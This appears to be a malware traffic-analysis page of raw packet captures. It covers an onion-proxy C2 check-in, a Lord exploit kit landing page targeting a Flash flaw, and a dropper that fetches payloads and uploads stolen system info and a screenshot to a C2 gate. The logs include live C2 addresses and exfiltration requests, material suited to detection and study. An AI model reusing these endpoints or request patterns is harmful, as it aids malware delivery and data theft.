.jPs...j9......8"P...S..4..\.>..W.......h...M.l.I.B.=...*i..8l..L.4..b'. .u. P..-.2 .o0...:...#p.........@....(..tg:%C...H.mZ.....!(.C.....$al_..`j....gD....H........ ..5,RL,1.-tW..pX. .... ]..."$`...!.k...p.3 L$g.6...A..=..r-._,..`...!.B.....!.bR.....pH.{.P...........C.....!t...F.X.......b.`1......A..`.)E.P....*e...,...\..w..4.]..<".H.#.Z.A4/.....0t...?yu.=...i.....m...;..A...u..r.E.......)....M..]'rH.jY $ ..%.$....-6..z E....m..#....u....4..&P.4......zO...../...(dk...\8Y.+..0%L..."...K<0<V.P3.8&.C.....iy<..!J.#.........7X ..M"..........?ghAl@ _.G.....b...q/2!y.,.........U.uI.5%h..ex, F..F..,.).jC. …4_LS..W..1j.?8+..)…J….-,.d……t@.q.. .P…….&.l..c<.05C..@…IP..i..n….,…,…tG..Y…..k2l..a. .9……hRQ{….q.{DHr..49......{D]I...w<....re.w ..9………….$..:…P..A..sV.C..T!…..7.|m..T_.U…..B…+e5B2.@.X…lDY..r.9!R?tJY2!.......dC.+n!s...... f.....&W..!...H!..4~~...L.w......R..L ..#....^0..4.h.<......\.$..Jq).( W..%T0D9.M..2@<.O..._.|4L....q...H. .>\F.._.....?("Jb.......$1...)y>a..,.......aM.....:.H.8B...a4;....V .....i x...W...:.i)%.VL.f@..C.W,.....W..Q=y..(....G..\2W..L...........*]b..q#...%2"..L...Hq...\..U ...K.$Cw.(b../Gh.XW.q..[.k%.A.W..0.&.".q)h.E<W................).#8.$2T0.I.FJ.A .{j.D".A.......8"6_L.O..>Pu/7u'bX.O.u!.....T.1.%w.:;].J........KRL.0...Ll....H(..X.I.. a..)..).H..l..w.k 2019-08-02 10:46:34.864666 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [.], seq 606166:607626, ack 133, win 64240, length 1460 E...........Q... ..e.....;......P........%....0X.......y........S..@/........UA[HP[_.6kQ.h...4.<&.%.._..}\ ...._.>.,.[[<......XD.]F.N..... ........M.L..|...p ...y...Z...)...........A..{.....k[..X.i..v..i.v./...........….$. .E.8..F..I….H…..L…l..i…Y…..O.tK.D..Z..z.RF..RH.|C…0../.i…8%…%a., !’… .&…….u.D...!..h.Hh.8%..i.x…..B.5;.Q…..c$X.hY..@s=..13.0….yu.0.X..$k……J.~a…Z..>………8..$…Wi…..sX..`7.q.T.....C"pZR2E&.7#.OK.J...6. h....;..\$...$.....a..9.....L..qJ...n.H..._...<-..M[.6.....>L%....WdHg...d....^.|...&.b....]..s8...c.!qE.H....4.....W..)|...-Qg.F.(.>%...].{.n.Z.....a.e.........%Z7.v9..> 5P…..N ….D…’…1.0.0…#E…...].<..3?8….H’].L….B….8..N.RM^..)…..$p.u-……]. .7.- .@.H….c.@….7….6..6#..u…….@…V,B#-#q..:B…P.5E.P Z……..CJ..TR.x.T.x…y…..ki……….xg.x…….).P…..m.)2p.).C..5..1.~…Y..….2.”. ……E.8..|.+….9..….@.HTTP.%m.i../t5. .X.?.$.p3….W…….%l../G…d…#=..C.i…..……P9T…..;…ep.+..?…..?.p<.fP$..y..i..=.b…..Og..m….Ci..}..G.{.J!..,%.c.)..X….|.wz….G..BC…[..u.Q.A….pN….0..a…&..SB..B…I…..\Z( ….V…Iw…9j=.NDxi..$…….yk….8….a.P…5. Jx…..w!TI..0.gv..$t…..+…$…-.2’…Bt…!….E….n.H.k.. …..$……..P.#…Y..^@.j”/gHp…..j..R)z.(%-s……u.p..W.e@…^.(M ..0I…o?d\5.c…BB.@ .|d..G..*.7,..q.z!..s.l… .VD....u.0....#,...c4A..C..( ..u-..,7....%.'.j...K.(5PS_..N..9..Q...$y..t8..C ).=<.\...9.T....Yt.().!RpK..Ppy…..

2019-08-02 10:46:41.513341 IP 10.8.2.101.49168 > 198.251.80.48.80: Flags [P.], seq 1:304, ack 1, win 64240, length 303: HTTP: POST /api/v1/check HTTP/1.1
E..W..@…..
..e..P0…P..%..>C.P….K..POST /api/v1/check HTTP/1.1
Host: evilnnwzczbcbi4edpi4tx3khwbnty3obfhemd5i5gbyci3hxx3k5pad.onion.pet
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Content-Length: 26
Accept-Encoding: gzip

{“uid”:”d708005f8b8c91d1″}
2019-08-02 10:46:50.050263 IP 198.251.80.48.80 > 10.8.2.101.49168: Flags [P.], seq 1:466, ack 304, win 64240, length 465: HTTP: HTTP/1.1 200 OK
E….I……..P0
..e.P…>C…&0P…q|..HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Fri, 02 Aug 2019 14:46:49 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 25
Connection: keep-alive
Set-Cookie: PHPSESSID=2ri00afk3bqb48pn4fg6sde643; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
cache-control: no-cache, no-store, must-revalidate
pragma: no-cache
expires: 0

{“response”:””,”code”:0}

2019-08-02 10:46:50.050886 IP 10.8.2.101.49168 > 198.251.80.48.80: Flags [.], seq 304:1764, ack 466, win 63775, length 1460: HTTP: POST /api/v1/sync HTTP/1.1
E…..@…..
..e..P0…P..&0.>E.P…….POST /api/v1/sync HTTP/1.1
Host: evilnnwzczbcbi4edpi4tx3khwbnty3obfhemd5i5gbyci3hxx3k5pad.onion.pet
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Content-Length: 1844
Accept-Encoding: gzip

..6….U..!..,b.)..P...:.bao)..dW,......u._...mF...Ht..f2!d.._...Q!-P.....4.Ka".X../....)...A}.k.p.T.R(..5.....$.p.?..V.....uH........6.|"N.g...a@~w!.stwW.....K[C..8..-m..=.H*..#'0......…&..4..s..[9X:….6..g..u.
…2.X/&….h1.@I.E^’..~..z.......F5~..,.3p...$-l}.W..4? ...}7L...*|..s.(vr_.9……ys3.BH….”{Kt…L.N.Y….\3…..”Q….,2tP….k…….1…d$..#h…….<.S.r6.N_7…!’……b…H[.Lm.u.,.G..dRWPEX1.U……..i2..Z)o……I.n…/..)..C.Q……2.F[.{V…..*kQ. ^D….D…U….KI{.f.B…v…..?)….y…. ……7.z.Kq..Z.SF….k.yg”T….-…..Z.x.(…%igr.A …K.f…..D…..;.K……<.]…….C.8.0.l(B………p>-.u..~.GB..C..s.jJu.]..<.m..OgM….g..u……….5E.A……i:>……O..Rp..#?..M%...{....4@6...@.(.O....Rv.1.f{….y..Q../TB…L.SE..X.:t….J..LG}…D.Uu……….^.!.o.Qdy..3,Y…^.9…b…..9..X..Tj.
.i$f.1….A..E………1.S…j….R….5Wr…avO…..v..w2./…]3.W.>}l.1.x..3….0.<}…{“…r6);.$………..f/’…C.i.X>..s.<..B..J.fO.A.~&...H#..[.....9.8vA{....2e...T<..4Q.s. ..a)u]x|....e.\.3.h...eD.......}.M.18......U.a,E..$……..o.T.jH.dlS..SIw.4…..H…,C…7.+….j…….e.n.x..>qL.z..=.8.mly.(…oo.”……r…UK…?.4.$v.X.V
2019-08-02 10:46:50.050909 IP 10.8.2.101.49168 > 198.251.80.48.80: Flags [P.], seq 1764:2426, ack 466, win 63775, length 662: HTTP
E…..@…..
..e..P0…P..+..>E.P….~….
9`..c#.....M...>.......%...7.).....Q.._Cwj-..U..PA..Ru..^.q....0.....t"........r.g..C.n.v...o.?...gw.....}......V|....B~........._..^.l...}B..z.. -.eP.....!.r.Y.....&..^. ........sr...X.....V...'..o.........o...-v..:.G...:...../.."...&j.p..B50n+"..z......a.c.K...t.9..d.W..hc... .'....F.A._o.'^Ev....d...%.j..}.. .........V...sK....Y.........Z.c...]8..H..Vak...~Uk...*.R....}.T...$..J....Usey U..X>....a.....,..8.S..[^....q.c..>w........gi....d..LE.d......("a.. .g..HV.8\...re4. -/+?T.-C..3...a(....6.3...Z...lh.....!N(4...Pb_.}.......S.qY?...U...X...r..8... o...7..K........Gq:W..0.. ..A….`~…a8.
.,g……._&4.N….h…C.<.0..#…..}EQ.\9…….m…bT. 2019-08-02 10:46:50.050978 IP 198.251.80.48.80 > 10.8.2.101.49168: Flags [.], ack 1764, win 64240, length 0
E..(.J……..P0
..e.P…>E…+.P….f..
2019-08-02 10:46:50.051038 IP 198.251.80.48.80 > 10.8.2.101.49168: Flags [.], ack 2426, win 64240, length 0
E..(.K……..P0
..e.P…>E….zP…….
2019-08-02 10:46:58.858491 IP 198.251.80.48.80 > 10.8.2.101.49168: Flags [P.], seq 466:931, ack 2426, win 64240, length 465: HTTP: HTTP/1.1 200 OK
E….N……..P0
..e.P…>E….zP…W…HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Fri, 02 Aug 2019 14:46:58 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 25
Connection: keep-alive
Set-Cookie: PHPSESSID=s59ap5rdus4stk4ds1i5hfsmh1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
cache-control: no-cache, no-store, must-revalidate
pragma: no-cache

NEW Flash Exploiting Lord EK Exploit Kit Found in the Wild PCAP Download Traffic Sample Analysis

A newly identified exploit kit is targeting vulnerable versions of Adobe’s Flash Player, Malwarebytes security researchers say.

Dubbed “Lord,” the exploit kit (EK) was initially identified by Virus Bulletin‘s Adrian Luca. The toolkit emerged as part of a malvertising chain via the PopCash ad network.

The EK uses a compromised website to redirect unsuspecting victims to its landing page. Initially, the portal was rather rudimentary and in clear text, but the toolkit operators quickly moved to obfuscate it. 

The landing page has a function to check for the presence of Flash Player, in an attempt to exploit the CVE-2018-15982 vulnerability.  One thing that sets the Lord EK apart from other toolkits is the use of the ngrok service to craft custom hostnames, which resulted in rather unusual URLs.  Source : https://www.securityweek.com/new-lord-exploit-kit-emerges

2019-08-01 13:19:06.834029 IP 10.8.1.102.65094 > 10.8.1.1.53: 46499+ A? 7b2cdd48.ngrok.io. (35)
E..?.s….#.
..f
….F.5.+……………7b2cdd48.ngrok.io…..
2019-08-01 13:19:06.891928 IP 10.8.1.1.53 > 10.8.1.102.65094: 46499 1/0/0 A 3.17.202.129 (51)
E..O!……U

..f.5.F.;……………7b2cdd48.ngrok.io…………………
2019-08-01 13:19:06.892846 IP 10.8.1.102.49160 > 3.17.202.129.80: Flags [S], seq 3866516344, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.t@…!P
..f…….P.v[x…… .s……………
2019-08-01 13:19:06.940656 IP 3.17.202.129.80 > 10.8.1.102.49160: Flags [S.], seq 2902076389, ack 3866516345, win 64240, options [mss 1460], length 0
E..,!…..?…..
..f.P….+..v[y`………..
2019-08-01 13:19:06.940887 IP 10.8.1.102.49160 > 3.17.202.129.80: Flags [.], ack 1, win 64240, length 0
E..(.w@…!Y
..f…….P.v[y..+.P…….
2019-08-01 13:19:06.941145 IP 10.8.1.102.49160 > 3.17.202.129.80: Flags [P.], seq 1:326, ack 1, win 64240, length 325: HTTP: GET /?GHRYb1AYhUQ7CY1Z3sfJHfdgiXnfmlZgiC2g7pV52z6UG8W3Lq4k0vs0ZIdzxVuY HTTP/1.1
E..m.x@… .
..f…….P.v[y..+.P…….GET /?GHRYb1AYhUQ7CY1Z3sfJHfdgiXnfmlZgiC2g7pV52z6UG8W3Lq4k0vs0ZIdzxVuY HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
DNT: 1
Connection: Keep-Alive
Host: 7b2cdd48.ngrok.io

2019-08-01 13:19:06.941243 IP 3.17.202.129.80 > 10.8.1.102.49160: Flags [.], ack 326, win 64240, length 0
E..(!…..?…..
..f.P….+..v.P….t..
2019-08-01 13:19:07.100312 IP 3.17.202.129.80 > 10.8.1.102.49160: Flags [.], seq 1:1461, ack 326, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E…!…..:E….
..f.P….+..v.P….-..HTTP/1.1 200 OK
Date: Thu, 01 Aug 2019 17:19:06 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked

4e91



POST /gate/log.php 31.210.171.200 Malware Dropper Trojan Downloader PCAP File Download Traffic Sample

2019-05-29 23:39:48.912311 IP 10.1.10.162.49184 > 10.1.10.224.80: Flags [P.], seq 3097589712:3097590130, ack 2503829794, win 16425, length 418: HTTP: GET /1.exe HTTP/1.1
E…..@…..
.
.
.
.. .P..w..=i”P.@)….GET /1.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 10.1.10.224
Connection: Keep-Alive

2019-05-29 23:39:49.588931 IP 10.1.10.224.80 > 10.1.10.162.49184: Flags [P.], seq 109501:110961, ack 418, win 237, length 1460: HTTP
E…..@.@…
.
.
.
..P. .?….yrP…….@……….t…..H.F………82A……..F…..”A..7….X.F…..”A..&….d.F.3.ZYYd..h..A………]…d.F…..d.F…..d.F…..d.F…..d.F…..d.F…..d.F…..d.F…..d.F.p…d.F.q…d.F.r…d.F.s…d.F.t…d.F.u…
d.F.v…d.F.w…d.F.x…d.F.y…d.F.z…d.F.{…d.F.|…d.F.}…d.F.~…d.F…..d.F.`…d.F.a…d.F.b…d.F.c…d.F.d…d.F.e…d.F.f…d.F.g…d.F.h…d.F.i…d.F.j…d.F.k…d.F.l…d.F.m…d.F.n…d.F.o…d.F.P…d.F.Q…d.F.R…d.F
.S…d.F.T…d.F.U…d.F.V…d.F.W…d.F.X…d.F.Y…d.F.Z…d.F.[…d.F….d.F.]…d.F.^…d.F._…d.F.@…d.F.A…d.F.B…d.F.C…d.F.D…d.F.E…d.F.F…d.F.G…d.F.H…d.F.I…d.F.J…d.F.K…d.F.L…d.F.M…d.F.N…d.F.O…d.F.0.
..d.F.1…d.F.2…d.F.3…d.F.4…d.F.5…d.F.6…d.F.7…d.F.8…d.F.9…d.F.:…d.F.;…d.F.<…U..3.Uh..A.d.0d. ….F.3.ZYYd..h..A…6…..]….-..F…..A…TColor……….@.4.A………………………..4.A…..@w@..;@..;@..;@.. <@..;@.(9@.D9@..9@..EInvalidGraphic..A………………………….A…..@w@..;@..;@..;@..<@..;@.(9@.D9@..9@..EInvalidGraphicOperation.@…A.. TFontPitch………..A. fpDefault fpVariable.fpFixed.Graphics…A. TFontName…A…TFontCharset………. .A.. TFontStyle………..A..fsBold.fsItalic.fsUnderline.fsStrikeOut.Graphics..p.A…TFontStyles…A…..A.. TPenStyle………..A..psSolid.psDash.psDot psDashDot.psDashDotDot.psClear.psInsideFrame.Graphics…A…TPenMode………..A..p mBlack.pmWhite.pmNop.pmNot.pmCopy pmNotCopy.pmMergePe 2019-05-29 23:39:49.590576 IP 10.1.10.224.80 > 10.1.10.162.49184: Flags [P.], seq 173741:175201, ack 418, win 237, length 1460: HTTP
E…..@.@…
.
2019-05-29 23:40:00.458551 IP 10.1.10.162.49188 > 31.210.171.200.80: Flags [P.], seq 1054931223:1054931413, ack 2808420310, win 16425, length 190: HTTP: POST /gate/log.php HTTP/1.1
E…..@…..
.
……$.P>….e..P.@)….POST /gate/log.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
Host: 31.210.171.200

2019-05-29 23:40:00.458560 IP 10.1.10.162.49188 > 31.210.171.200.80: Flags [P.], seq 190:345, ack 1, win 16425, length 155: HTTP
E…..@…..
.
……$.P>….e..P.@).2..params=Ym90X2lkPUYyQkMyQjBCLUM3MjYtNEVBMi04RjdELTVDMzA1NEQ4RkExRl9yeTR3biZjb25maWdfaWQ9NTkwMzI0ZDZkMzE1YjBmMDdmMDFkNjlkZWQ0MGNkYTM4NmZiMDk0NiZkYXRhPW51bGw=
2019-05-29 23:40:00.724098 IP 31.210.171.200.80 > 10.1.10.162.49188: Flags [P.], seq 1:567, ack 345, win 245, length 566: HTTP: HTTP/1.1 200 OK
E .^.o@.4…….
.
..P.$.e..>..pP…Y…HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Thu, 30 May 2019 03:40:00 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *

15f
{“url”:”http://31.210.171.200/file_handler/file.php?hash=fd6a281324a57b6258a807e86a258957a8bf4bde&js=21b42a021c078f99045bddc55087e5af4bfd64bc&callback=http://31.210.171.200/gate”,”attachment_url”:”http://31.210.171.200/gate/sqlite3.dll”,”libraries”:”http://31.210.171.200/gate/libs.zip”,”ip”:”73.135.186.44″,”config”:{“masks”:null,”loader_urls”:null}}
0

2019-05-29 23:40:01.027541 IP 31.210.171.200.80 > 10.1.10.162.49188: Flags [P.], seq 1:567, ack 345, win 245, length 566: HTTP: HTTP/1.1 200 OK
E .^.p@.4…….
.
..P.$.e..>..pP…Y…HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Thu, 30 May 2019 03:40:00 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *

15f
{“url”:”http://31.210.171.200/file_handler/file.php?hash=fd6a281324a57b6258a807e86a258957a8bf4bde&js=21b42a021c078f99045bddc55087e5af4bfd64bc&callback=http://31.210.171.200/gate”,”attachment_url”:”http://31.210.171.200/gate/sqlite3.dll”,”libraries”:”http://31.210.171.200/gate/libs.zip”,”ip”:”73.135.186.44″,”config”:{“masks”:null,”loader_urls”:null}}

2019-05-29 23:40:01.135113 IP 10.1.10.162.49189 > 31.210.171.200.80: Flags [P.], seq 2907559582:2907559879, ack 1455228641, win 16425, length 297: HTTP: GET /gate/sqlite3.dll HTTP/1.1
E..Q..@….Q
.
……%.P.M..V…P.@)i…GET /gate/sqlite3.dll HTTP/1.1
Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: 31.210.171.200
Connection: Keep-Alive

2019-05-29 23:40:03.662144 IP 10.1.10.162.49189 > 31.210.171.200.80: Flags [P.], seq 297:591, ack 917003, win 65335, length 294: HTTP: GET /gate/libs.zip HTTP/1.1
E..N..@….V
.
……%.P.M..V…P..7B…GET /gate/libs.zip HTTP/1.1
Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: 31.210.171.200
Connection: Keep-Alive

2019-05-29 23:40:05.273384 IP 31.210.171.200.80 > 10.1.10.162.49189: Flags [P.], seq 3744744:3745578, ack 591, win 245, length 834: HTTP
E .j..@.4…….
.
..P.%V...M..P…8P……..znN..i..(..8G….$……. …G.).api-ms-win-core-file-l2-1-0.dll . ………d0.^....R^%.....R^%....PK...........znNB.p.a(..8G..!.$....... ...Z.*.api-ms-win-core-handle-l1-1-0.dll . .........nW.^…..^%……^%….PK………..znN ..q.)..8G….$……. ….?.api-ms-win-core-heap-l1-1-0.dll
. ………nW.^...G._%....G._%....PK...........znN...##'...E..&.$....... ...:i*.api-ms-win-core-interlocked-l1-1-0.dll . ..........~.^…y.%….y.%….PK………..znNL…J)..8I..(.$……. …...api-ms-win-core-libraryloader-l1-1-0.dll . ……….~.^.....%……%....PK...........znN.....+..8Q..'.$....... ...1.*.api-ms-win-core-localization-l1-2-0.dll . ............^….N%.....N%….PK………..znN1….)..8I..!.$……. …?..api-ms-win-core-memory-l1-1-0.dll
. …………^.....%……`%….PK……:.:.t…..+…
2019-05-29 23:40:14.608543 IP 10.1.10.162.49188 > 31.210.171.200.80: Flags [P.], seq 345:689, ack 567, win 16283, length 344: HTTP: POST /file_handler/file.php?hash=fd6a281324a57b6258a807e86a258957a8bf4bde&js=21b42a021c078f99045bddc55087e5af4bfd64bc&callback=http://31.210.171.200/gate HTTP/1.1
E….a@…..
.
……$.P>..p.e..P.?…..POST /file_handler/file.php?hash=fd6a281324a57b6258a807e86a258957a8bf4bde&js=21b42a021c078f99045bddc55087e5af4bfd64bc&callback=http://31.210.171.200/gate HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data, boundary=Jfbvjwj3489078yuyetu
Content-Length: 63918
Host: 31.210.171.200

2019-05-29 23:40:15.012041 IP 10.1.10.162.49188 > 31.210.171.200.80: Flags [P.], seq 63469:64607, ack 567, win 16283, length 1138: HTTP
E…..@…..
.
……$.P>….e..P.?.f…….8..b..Hl
.giT…BX:..D..7Y%3.4
…~$Z.8….K.u6.T………H….0}………….](..J.wK..b.Is…..@..}……….}o…..h..j..HP.JT.”..’B.A_u.hn”..S…;..R;..!.
-.fual[.MZ.L.qn.W.s.9.t=….C..S.=…@.M…fW4,w..4y.d-…/…….T..bf.2M…….eWoh…,./….;?+.S.PP.C...I.........K....[ RM.q. jTx.x... 8:W<!.+..j.4..(....W...."..O.......zD^.].....[..i..F.=.B..0.1.>..1..'...J.........0V..5.. c..._..3..>_.../ ..+N..X...v.H..R.....{I,..u..Z.^..\.E.$. ~...[5. ^o...P.bY.h.......w...$+.~t..57.0g...e.V%Q.R..M3..fm-1...]o+.x.F....E....W.......R.W.(..|.......<b.8..}7..:.>...srt6.r.....B.. U?V.$y.{..{..(..7.....r&%..u)D.V.C]..." ..y...&]7......@.%t&.{W. UZZ..#.....K.N..N@.;....o{...W.yl..E>.xT.D.^._...'9.p.Qw.?.....1V=..M...{W.vr)Tg.....Sp...g.....+."..............e...U...{...D0iZ...,.... ...].G2.......K …#….E.l.]..UN.v)……W gt.c..f}.Q….]..)6.…]..0………Fi.{ 4a&K……..6#…….nK.’.;……U..Z……e.|.Yb…’….z…..GVRI.F.8…PK………….NF.i……….. ……. …….System Info.txtUT….4.\PK………….N….Z…….
. ……. …….screen.pngUT….4.\PK…………..n…..
–Jfbvjwj3489078yuyetu–
2019-05-29 23:40:15.573069 IP 31.210.171.200.80 > 10.1.10.162.49188: Flags [P.], seq 567:793, ack 64607, win 1252, length 226: HTTP: HTTP/1.1 200 OK
E .
..@.4…….
.
..P.$.e..>..vP….v..HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Thu, 30 May 2019 03:40:15 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *

d
true”success”
0